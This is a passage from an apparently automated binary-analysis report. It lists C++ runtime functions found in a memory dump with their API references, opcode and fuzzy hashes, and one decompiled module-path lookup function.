                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F051BFB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 5519f21e89f2b3d9dc187421dbb9e8a58d898130ac4804dee741483c6130c12f
                                                                                                            • Instruction ID: 78e2249a0a2d1da8e4b2e616a4ba3698b636dabaad772cf7e4661a28364aea51
                                                                                                            • Opcode Fuzzy Hash: 5519f21e89f2b3d9dc187421dbb9e8a58d898130ac4804dee741483c6130c12f
                                                                                                            • Instruction Fuzzy Hash: 1001D671900629DBCF05DFA4CB907BE77B1AF45328F24450AE4116B2C0DFB0A966CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F065398, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06539F
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0653A9
                                                                                                            • int.LIBCPMT ref: 6F0653C0
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0653FA
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F06541A
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065427
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 615741aed25f9eea7d872d28ffdb3cf8e40845b18207f1038ff2f489ef94798f
                                                                                                            • Instruction ID: 488b7b735b8239090ba841f9455642ca00d16b148e3fdf1375c6e9a5afbb71d7
                                                                                                            • Opcode Fuzzy Hash: 615741aed25f9eea7d872d28ffdb3cf8e40845b18207f1038ff2f489ef94798f
                                                                                                            • Instruction Fuzzy Hash: FA01F535904729DBCF05DBA8CA40BBEB7B2BF45728F240549E4106B2C1CFB0AE52CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0573BA, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0573C1
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0573CB
                                                                                                            • int.LIBCPMT ref: 6F0573E2
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05741C
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F05743C
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057449
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: d29f7c8fe92ea89ea86dfacbb3413c66ca9dfd79f7eb751f149069d42eca4848
                                                                                                            • Instruction ID: 3a693c09dda025705ae11518adbc8a6251aaf86386d7824c222e44d87ad1f284
                                                                                                            • Opcode Fuzzy Hash: d29f7c8fe92ea89ea86dfacbb3413c66ca9dfd79f7eb751f149069d42eca4848
                                                                                                            • Instruction Fuzzy Hash: 8601F57590062ADBCF05DBA4CB447BE77B2BF45328F24440AD4146B2C0CFB4AA66DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057BE0, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057BE7
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057BF1
                                                                                                            • int.LIBCPMT ref: 6F057C08
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057C42
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057C62
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057C6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: ef966a55218bb6aff91eee1de9dbbbe0979c94882d5a00c4c4e7849697a74e35
                                                                                                            • Instruction ID: fc10d4cfd450492e71f458a4edd6bc759a0840643c3bc126732b3fa50f30307a
                                                                                                            • Opcode Fuzzy Hash: ef966a55218bb6aff91eee1de9dbbbe0979c94882d5a00c4c4e7849697a74e35
                                                                                                            • Instruction Fuzzy Hash: F701D6B19046299BCF05DBA4CB407AD7BB2AF45328F64450AD4116B3C1CFB0AE21DB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057A21, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057A28
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057A32
                                                                                                            • int.LIBCPMT ref: 6F057A49
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057A83
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057AA3
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057AB0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 90a2acd80ca99f114631e64b42405c98859b74116c4d405ba456a840b2ea58c3
                                                                                                            • Instruction ID: 2c5f24015bbc94052587f3e34a3b079db586f4cc527b002d1319cbca4bfb7015
                                                                                                            • Opcode Fuzzy Hash: 90a2acd80ca99f114631e64b42405c98859b74116c4d405ba456a840b2ea58c3
                                                                                                            • Instruction Fuzzy Hash: 9C01D6319007299BCF05DBA4CB447AEB7B2AF85328F244409E4116B3C0DFB0AA61D791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F05798C, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057993
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05799D
                                                                                                            • int.LIBCPMT ref: 6F0579B4
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0579EE
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057A0E
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057A1B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 4672c86359b15deede1b3ebe836fe350406865225b2df5f5eb2c6ce8a875e3f1
                                                                                                            • Instruction ID: ab26188bf35bf941d89669b1a64916f129bbe7d81ac5e113bcfe29c7660636d6
                                                                                                            • Opcode Fuzzy Hash: 4672c86359b15deede1b3ebe836fe350406865225b2df5f5eb2c6ce8a875e3f1
                                                                                                            • Instruction Fuzzy Hash: 0401D6319006299BCF05DBA4CB447AEB7B2AF85728F24840AD4116B2C0CFB49A22DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F05E031, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Mpunct$GetvalsH_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            • API String ID: 2204710431-1686923651
                                                                                                            • Opcode ID: 48d803e3983f2eafb7dc72b8ca8c8247c581b3c9a1c677fa654f56b8acd633b1
                                                                                                            • Instruction ID: f12773197ed6076ee7b6929c508d3a4268f2a591e3aa1108066664ad95ec3c68
                                                                                                            • Opcode Fuzzy Hash: 48d803e3983f2eafb7dc72b8ca8c8247c581b3c9a1c677fa654f56b8acd633b1
                                                                                                            • Instruction Fuzzy Hash: 6121C1B1904B52AEDB21CF74899077BBFF8AF0D204F040A1EE499C7A82D374E655CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F092B27, Relevance: 7.7, APIs: 5, Instructions: 186COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3033488037-0
                                                                                                            • Opcode ID: a06da61242bb11f34d549e241ae141fd850ba9a100b2dcc5753b3a75c799a0d3
                                                                                                            • Instruction ID: 27195d4a6bd25ab5779c4fccc23375304620b692334907668d976880b2230131
                                                                                                            • Opcode Fuzzy Hash: a06da61242bb11f34d549e241ae141fd850ba9a100b2dcc5753b3a75c799a0d3
                                                                                                            • Instruction Fuzzy Hash: CC51F072A00705AFDB11CF69CD80BAA77F9EF48724F54556AE819DB290F731EA01DB80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F05E244, Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: MaklocchrMaklocstr$H_prolog3_
                                                                                                            • String ID:
                                                                                                            • API String ID: 2404127365-0
                                                                                                            • Opcode ID: 9237c9634faff5291540bba545202f19b7a1ab7cdb9fea1b2605ea5700b26fb1
                                                                                                            • Instruction ID: 345acad25d90dc5e158c516392f9296443e20be13a28f6a7014189bc3251f7ed
                                                                                                            • Opcode Fuzzy Hash: 9237c9634faff5291540bba545202f19b7a1ab7cdb9fea1b2605ea5700b26fb1
                                                                                                            • Instruction Fuzzy Hash: 6F2189B5C00348AADB14DFE5C984B9FBBB8EF85304F00844AF9159F295EBB0E650CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0567FA, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocstr$Maklocchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 2020259771-0
                                                                                                            • Opcode ID: 497018d5bf681ea43fd2957ad9186fadbae655563c15be32ada046ba1595cb08
                                                                                                            • Instruction ID: 8bd3a21cd2ea6de165e37a24b9b0dcf162ab81b194169f2421ee1258edc51282
                                                                                                            • Opcode Fuzzy Hash: 497018d5bf681ea43fd2957ad9186fadbae655563c15be32ada046ba1595cb08
                                                                                                            • Instruction Fuzzy Hash: 94118FB1904745BFE720CBE5D940F12F7ECAB06614F04861AF244CB680D7B4F9608BA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09CEE5, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 6F09CEFD
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09CF0F
                                                                                                            • _free.LIBCMT ref: 6F09CF21
                                                                                                            • _free.LIBCMT ref: 6F09CF33
                                                                                                            • _free.LIBCMT ref: 6F09CF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 7785394202896f354cb6fdaaf58be89608731bf3d8d3e4f526a95999c8a6bf26
                                                                                                            • Instruction ID: 645f28c00cbc64f63cdc759d2ff3026ed925e175ad1e5e83973181500c503f6c
                                                                                                            • Opcode Fuzzy Hash: 7785394202896f354cb6fdaaf58be89608731bf3d8d3e4f526a95999c8a6bf26
                                                                                                            • Instruction Fuzzy Hash: 90F09631B09B05978F01CF58E194FD737DDAA097247A8A806F428D7582E730F880AAD0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F046020, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 183COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Smanip$task
                                                                                                            • String ID: .
                                                                                                            • API String ID: 1925983085-248832578
                                                                                                            • Opcode ID: 4b41ea781811e630ff1d789c88b697b356592b52aff7bf56500c5108ecfed2f5
                                                                                                            • Instruction ID: b8c5378a4252ac098d3b0ab02ad0449f8b77eccccc9051a64f554afcca11e8ce
                                                                                                            • Opcode Fuzzy Hash: 4b41ea781811e630ff1d789c88b697b356592b52aff7bf56500c5108ecfed2f5
                                                                                                            • Instruction Fuzzy Hash: 4D816571D00615DFCB08CFA8CE90BEDBBB5FB46314F208169D90697292E7386A58EF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F05DF66, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05DF6D
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F05681A
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F056837
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F056854
                                                                                                              • Part of subcall function 6F0567FA: _Maklocchr.LIBCPMT ref: 6F056866
                                                                                                              • Part of subcall function 6F0567FA: _Maklocchr.LIBCPMT ref: 6F056879
                                                                                                            • _Mpunct.LIBCPMT ref: 6F05DFFA
                                                                                                            • _Mpunct.LIBCPMT ref: 6F05E014
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            • API String ID: 2939335142-1686923651
                                                                                                            • Opcode ID: fa5eda1acda0eb454e782883385d3013d439e0da0f2c913806614e0270660b03
                                                                                                            • Instruction ID: 8ca5c308709437c06f76671e914b5d89b186fa76813ba50b197285019482c5bc
                                                                                                            • Opcode Fuzzy Hash: fa5eda1acda0eb454e782883385d3013d439e0da0f2c913806614e0270660b03
                                                                                                            • Instruction Fuzzy Hash: 152190B1904B56AEDB21DF74C990B7BBEF8AB0D204F140A1AE499C7A81D774E611CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F066B83, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Mpunct$H_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            • API String ID: 4281374311-1686923651
                                                                                                            • Opcode ID: 865f8aad70552428da9ae0f4d1a9d421807648b658977dd57db98c1f88f24f9f
                                                                                                            • Instruction ID: 0ebb90cd6f6833f080f0979ab76f45294f4409871a830e26fcc210b76730eb51
                                                                                                            • Opcode Fuzzy Hash: 865f8aad70552428da9ae0f4d1a9d421807648b658977dd57db98c1f88f24f9f
                                                                                                            • Instruction Fuzzy Hash: 5E2192B1904B56AED721CF74889077BBEF8AB0D304F140A1AE459CBA81D774E651CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0502A0, Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: task
                                                                                                            • String ID:
                                                                                                            • API String ID: 1384045349-0
                                                                                                            • Opcode ID: 3a15674fe1360c87d04afa97441156d49c37df8709f9e57c413d792701f91831
                                                                                                            • Instruction ID: 2d0d78d5ca723a82be8ec1214a7b011d69785de88f297db904585521070fc0e0
                                                                                                            • Opcode Fuzzy Hash: 3a15674fe1360c87d04afa97441156d49c37df8709f9e57c413d792701f91831
                                                                                                            • Instruction Fuzzy Hash: B7412AB5D00258DFDB10CFA4C940BEDBBB4BB48318F1086ADE419A7281EB755A44CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F08F299, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                            • _free.LIBCMT ref: 6F08F2FB
                                                                                                            • _free.LIBCMT ref: 6F08F331
                                                                                                            • SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2283115069-0
                                                                                                            • Opcode ID: b17d0e65e532aba36f15f605098d49146fb13c2326fa3e70311ce71eb5e2df46
                                                                                                            • Instruction ID: e7a97c44f1a1549d0ac0b7558e3954f24a32ed56941c58a1bdb6254c12d50cde
                                                                                                            • Opcode Fuzzy Hash: b17d0e65e532aba36f15f605098d49146fb13c2326fa3e70311ce71eb5e2df46
                                                                                                            • Instruction Fuzzy Hash: F711E97630AF026EDF1116749D84FAF339D9BC22BEB642225F5349B1C1FF219816A150
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F08F3F0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,?,6F078835,6F08F53A,?,?,6F04565E,000008BB,6F0DA0D4), ref: 6F08F3F5
                                                                                                            • _free.LIBCMT ref: 6F08F452
                                                                                                            • _free.LIBCMT ref: 6F08F488
                                                                                                            • SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,?,?,6F078835,6F08F53A,?,?,6F04565E,000008BB,6F0DA0D4), ref: 6F08F493
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2283115069-0
                                                                                                            • Opcode ID: 248d955f71a801132fc3f5126a5b5ebd8414a16dd3941e3cc1b60f10ffa1f15f
                                                                                                            • Instruction ID: e40a6ca78ecbda4efc4bfb607370b5500c4b2238d107eb0c6ffcfd882e16a32a
                                                                                                            • Opcode Fuzzy Hash: 248d955f71a801132fc3f5126a5b5ebd8414a16dd3941e3cc1b60f10ffa1f15f
                                                                                                            • Instruction Fuzzy Hash: BA11087630AB012EEF1116788C80F6F379DABC627AB643236F938871D1FF709815A160
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F04F800, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F05039A
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503A6
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503B2
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503C1
                                                                                                            • task.LIBCPMTD ref: 6F04F87F
                                                                                                            • task.LIBCPMTD ref: 6F04F88B
                                                                                                            • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6F04F8A0
                                                                                                            • task.LIBCPMTD ref: 6F04F8B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                            • String ID:
                                                                                                            • API String ID: 2520070614-0
                                                                                                            • Opcode ID: 74c0039afd9be9bfa277b7155dd36234673c2a6c548d30854eb7c63d77806f22
                                                                                                            • Instruction ID: bf56e73db4866b691eb5a8ccfe326f073bd6e53e3ab3b285d7326b4ee54391d8
                                                                                                            • Opcode Fuzzy Hash: 74c0039afd9be9bfa277b7155dd36234673c2a6c548d30854eb7c63d77806f22
                                                                                                            • Instruction Fuzzy Hash: F121FAB1D0024CEBCB04DFE4C950BDEBBB9FB48318F148169E519AB294DB346A05CB54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F051E2F, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F051E36
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F051E43
                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6F051E80
                                                                                                              • Part of subcall function 6F050FAE: _Yarn.LIBCPMT ref: 6F050FCD
                                                                                                              • Part of subcall function 6F050FAE: _Yarn.LIBCPMT ref: 6F050FF1
                                                                                                            • std::exception::exception.LIBCMTD ref: 6F051EA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
                                                                                                            • String ID:
                                                                                                            • API String ID: 2425033533-0
                                                                                                            • Opcode ID: 068de06cd81252e7670178095b09e314b0f514ddc13a0911309fed16d92a2d3a
                                                                                                            • Instruction ID: 16ea2ed692671786158aa57e3f411c0664fcb135a78c689c6fc0a7f567fc5b0b
                                                                                                            • Opcode Fuzzy Hash: 068de06cd81252e7670178095b09e314b0f514ddc13a0911309fed16d92a2d3a
                                                                                                            • Instruction Fuzzy Hash: C8018C71905754DECB309FAA858078BFEE0BF28214B50896FE58E87A41C771A510CBAA
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F092439, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID: -
                                                                                                            • API String ID: 269201875-2547889144
                                                                                                            • Opcode ID: ff46db10ad3bf996c822c11df43c6b2d41a6a45196c34a87bd487786654de76e
                                                                                                            • Instruction ID: dd04d97c3ded2eb6ea598c02f791702432311bcdef09cb612bdcde9900f5b201
                                                                                                            • Opcode Fuzzy Hash: ff46db10ad3bf996c822c11df43c6b2d41a6a45196c34a87bd487786654de76e
                                                                                                            • Instruction Fuzzy Hash: 65C1D271A042159BDF24DF64CC50BEEB3F9FF15718F5064AAD819AB180FB31AA81EB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F031AD7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E6F031AD7(void* __ecx, WCHAR** _a4) {
				struct HINSTANCE__* _v8;
				long _v12;
				long _t10;
				long _t19;
				long _t20;
				WCHAR* _t23;

				_v8 =  *0x6f0341b0;
				_t19 = 0x104;
				_t23 = E6F031000(0x208);
				if(_t23 == 0) {
					L8:
					_t20 = 8;
					L9:
					return _t20;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t10 = GetModuleFileNameW(_v8, _t23, _t19);
					_v12 = _t10;
					if(_t10 == 0 || _t19 != _t10) {
						break;
					}
					_t19 = _t19 + 0x104;
					E6F031397(_t23);
					_t23 = E6F031000(_t19 + _t19);
					if(_t23 != 0) {
						continue;
					}
					break;
				}
				_t20 = 0;
				if(_t23 == 0) {
					goto L8;
				}
				if(_v12 == 0) {
					_t20 = GetLastError();
					E6F031397(_t23);
				} else {
					 *_a4 = _t23;
				}
				goto L9;
			}









                                                                                                            0x6f031ae8
                                                                                                            0x6f031aeb
                                                                                                            0x6f031af5
                                                                                                            0x6f031af9
                                                                                                            0x6f031b4e
                                                                                                            0x6f031b50
                                                                                                            0x6f031b51
                                                                                                            0x6f031b56
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f031afb
                                                                                                            0x6f031afb
                                                                                                            0x6f031b00
                                                                                                            0x6f031b06
                                                                                                            0x6f031b0b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f031b12
                                                                                                            0x6f031b18
                                                                                                            0x6f031b26
                                                                                                            0x6f031b2a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f031b2a
                                                                                                            0x6f031b2c
                                                                                                            0x6f031b30
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f031b35
                                                                                                            0x6f031b45
                                                                                                            0x6f031b47
                                                                                                            0x6f031b37
                                                                                                            0x6f031b3a
                                                                                                            0x6f031b3a
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F031000: HeapAlloc.KERNEL32(00000000,?,6F0315ED,00000030,747863F0,00000000), ref: 6F03100C
